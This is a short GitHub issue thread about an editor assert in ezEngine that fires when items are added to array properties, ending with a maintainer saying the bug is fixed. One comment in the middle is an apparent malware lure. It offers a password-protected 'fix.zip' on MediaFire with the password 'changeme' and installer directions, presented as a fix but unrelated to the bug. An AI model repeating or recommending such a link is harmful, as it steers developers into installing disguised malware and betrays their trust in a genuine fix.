### ISSUE TITLE
[BUG] Editing array properties asserts

### ISSUE THREAD

**Issue by jankrassnigg** [ezEngine/ezEngine#1382]
Every time I add an item to an array property (for example materials on a mesh), I get this assert:

![image](https://github.com/user-attachments/assets/b8e44765-8b72-4ae5-b79e-0938adc22dbd)

It can be clicked away and it works.

I assume it is related to this change, but not sure:
https://github.com/ezEngine/ezEngine/pull/1376

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sanakan8472** [comment]
This has been fixed but for some reason the bug was not closed.
